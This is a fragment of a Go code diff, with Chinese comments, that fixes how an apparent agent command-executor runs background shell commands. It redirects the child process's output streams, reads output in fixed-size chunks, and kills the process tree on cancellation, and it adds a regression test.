// IsBackgroundShellCommand 检测命令是否为完全后台命令(末尾有独立 &,且不在引号内)。
|
||||
// command1 & command2 不算完全后台(command2 仍在前台执行)。
|
||||
func IsBackgroundShellCommand(command string) bool {
|
||||
// 移除首尾空格
|
||||
command = strings.TrimSpace(command)
|
||||
if command == "" {
|
||||
@@ -827,7 +830,7 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int
|
||||
}
|
||||
|
||||
// 检测是否为后台命令(包含 & 符号,但不在引号内)
|
||||
isBackground := e.isBackgroundCommand(command)
|
||||
isBackground := IsBackgroundShellCommand(command)
|
||||
|
||||
// 构建命令
|
||||
var cmd *exec.Cmd
|
||||
@@ -837,6 +840,8 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int
|
||||
} else {
|
||||
cmd = exec.CommandContext(ctx, shell, "-c", command)
|
||||
}
|
||||
applyDefaultTerminalEnv(cmd)
|
||||
_ = prepareShellCmdSession(cmd)
|
||||
|
||||
// 执行命令
|
||||
e.logger.Info("执行系统命令",
|
||||
@@ -852,9 +857,10 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int
|
||||
commandWithoutAmpersand := strings.TrimSuffix(strings.TrimSpace(command), "&")
|
||||
commandWithoutAmpersand = strings.TrimSpace(commandWithoutAmpersand)
|
||||
|
||||
// 构建新命令:command & pid=$!; echo $pid
|
||||
// 使用变量保存PID,确保能获取到正确的后台进程PID
|
||||
pidCommand := fmt.Sprintf("%s & pid=$!; echo $pid", commandWithoutAmpersand)
|
||||
// 构建新命令:将用户命令置于独立重定向的后台作业,再 echo $pid。
|
||||
// 若子进程与 echo 共享同一 stdout 管道,且长时间不向 stdout 写入换行,
|
||||
// bufio.ReadString('\n') 会永久阻塞(例如 beacon 持续写二进制/单行日志)。
|
||||
pidCommand := fmt.Sprintf("%s </dev/null >/dev/null 2>&1 & pid=$!; echo $pid", commandWithoutAmpersand)
|
||||
|
||||
// 创建新命令来获取PID
|
||||
var pidCmd *exec.Cmd
|
||||
@@ -864,6 +870,8 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int
|
||||
} else {
|
||||
pidCmd = exec.CommandContext(ctx, shell, "-c", pidCommand)
|
||||
}
|
||||
applyDefaultTerminalEnv(pidCmd)
|
||||
_ = prepareShellCmdSession(pidCmd)
|
||||
|
||||
// 获取stdout管道
|
||||
stdout, err := pidCmd.StdoutPipe()
|
||||
@@ -975,7 +983,7 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int
|
||||
var err error
|
||||
// 若上层提供工具输出增量回调,则边执行边流式读取。
|
||||
if cb, ok := ctx.Value(ToolOutputCallbackCtxKey).(ToolOutputCallback); ok && cb != nil {
|
||||
output, err = streamCommandOutput(cmd, cb)
|
||||
output, err = streamCommandOutput(ctx, cmd, cb)
|
||||
if err != nil && shouldRetryWithPTY(output) {
|
||||
e.logger.Info("检测到系统命令需要 TTY,使用 PTY 重试")
|
||||
cmd2 := exec.CommandContext(ctx, shell, "-c", command)
|
||||
@@ -983,6 +991,7 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int
|
||||
cmd2.Dir = workDir
|
||||
}
|
||||
applyDefaultTerminalEnv(cmd2)
|
||||
_ = prepareShellCmdSession(cmd2)
|
||||
output, err = runCommandWithPTY(ctx, cmd2, cb)
|
||||
}
|
||||
} else {
|
||||
@@ -996,6 +1005,7 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int
|
||||
cmd2.Dir = workDir
|
||||
}
|
||||
applyDefaultTerminalEnv(cmd2)
|
||||
_ = prepareShellCmdSession(cmd2)
|
||||
output, err = runCommandWithPTY(ctx, cmd2, nil)
|
||||
}
|
||||
}
|
||||
@@ -1033,8 +1043,11 @@ func (e *Executor) executeSystemCommand(ctx context.Context, args map[string]int
|
||||
}
|
||||
|
||||
// streamCommandOutput 以“边读边回调”的方式读取命令 stdout/stderr。
|
||||
// 保持输出内容完整拼接返回,并用 cb(chunk) 向上层持续推送。
|
||||
func streamCommandOutput(cmd *exec.Cmd, cb ToolOutputCallback) (string, error) {
|
||||
// 使用定长块读取,避免按行读取在无换行输出时永久阻塞;ctx 取消时终止进程树。
|
||||
func streamCommandOutput(ctx context.Context, cmd *exec.Cmd, cb ToolOutputCallback) (string, error) {
|
||||
if err := prepareShellCmdSession(cmd); err != nil {
|
||||
return "", err
|
||||
}
|
||||
stdoutPipe, err := cmd.StdoutPipe()
|
||||
if err != nil {
|
||||
return "", err
|
||||
@@ -1050,18 +1063,27 @@ func streamCommandOutput(cmd *exec.Cmd, cb ToolOutputCallback) (string, error) {
|
||||
return "", err
|
||||
}
|
||||
|
||||
stopWatch := make(chan struct{})
|
||||
go func() {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
terminateCmdTree(cmd)
|
||||
case <-stopWatch:
|
||||
}
|
||||
}()
|
||||
defer close(stopWatch)
|
||||
|
||||
chunks := make(chan string, 64)
|
||||
var wg sync.WaitGroup
|
||||
readFn := func(r io.Reader) {
|
||||
defer wg.Done()
|
||||
br := bufio.NewReader(r)
|
||||
buf := make([]byte, 8192)
|
||||
for {
|
||||
s, readErr := br.ReadString('\n')
|
||||
if s != "" {
|
||||
chunks <- s
|
||||
n, readErr := r.Read(buf)
|
||||
if n > 0 {
|
||||
chunks <- string(buf[:n])
|
||||
}
|
||||
if readErr != nil {
|
||||
// EOF 正常结束
|
||||
return
|
||||
}
|
||||
}
|
||||
@@ -1157,12 +1179,14 @@ func runCommandWithPTY(ctx context.Context, cmd *exec.Cmd, cb ToolOutputCallback
|
||||
if runtime.GOOS == "windows" {
|
||||
// PTY 方案为类 Unix;Windows 走原逻辑
|
||||
if cb != nil {
|
||||
return streamCommandOutput(cmd, cb)
|
||||
return streamCommandOutput(ctx, cmd, cb)
|
||||
}
|
||||
_ = prepareShellCmdSession(cmd)
|
||||
out, err := cmd.CombinedOutput()
|
||||
return string(out), err
|
||||
}
|
||||
|
||||
_ = prepareShellCmdSession(cmd)
|
||||
ptmx, err := pty.Start(cmd)
|
||||
if err != nil {
|
||||
return "", err
|
||||
@@ -1175,9 +1199,7 @@ func runCommandWithPTY(ctx context.Context, cmd *exec.Cmd, cb ToolOutputCallback
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
_ = ptmx.Close() // 触发读退出
|
||||
if cmd.Process != nil {
|
||||
_ = cmd.Process.Kill()
|
||||
}
|
||||
terminateCmdTree(cmd)
|
||||
case <-done:
|
||||
}
|
||||
}()
|
||||
|
||||
@@ -205,6 +205,29 @@ func TestExecutor_ExecuteInternalTool_NoStorage(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T) {
|
||||
executor, _ := setupTestExecutor(t)
|
||||
// 子进程先向 stdout 写无换行字符再长时间 sleep;若与 echo $pid 共享管道且未重定向子进程 stdout,
|
||||
// ReadString('\n') 会阻塞到子进程退出。后台包装须将子进程标准流与 PID 行分离。
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second)
|
||||
defer cancel()
|
||||
args := map[string]interface{}{
|
||||
"command": `(sh -c 'printf x; sleep 120') &`,
|
||||
"shell": "sh",
|
||||
}
|
||||
res, err := executor.executeSystemCommand(ctx, args)
|
||||
if err != nil {
|
||||
t.Fatalf("executeSystemCommand: %v", err)
|
||||
}
|
||||
if res == nil || res.IsError {
|
||||
t.Fatalf("expected success, got %+v", res)
|
||||
}
|
||||
txt := res.Content[0].Text
|
||||
if !strings.Contains(txt, "后台命令已启动") {
|
||||
t.Fatalf("unexpected body: %q", txt)
|
||||
}
|
||||
}
|
||||
|
||||
func TestPaginateLines(t *testing.T) {
|
||||
lines := []string{"Line 1", "Line 2", "Line 3", "Line 4", "Line 5"}
|
||||
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user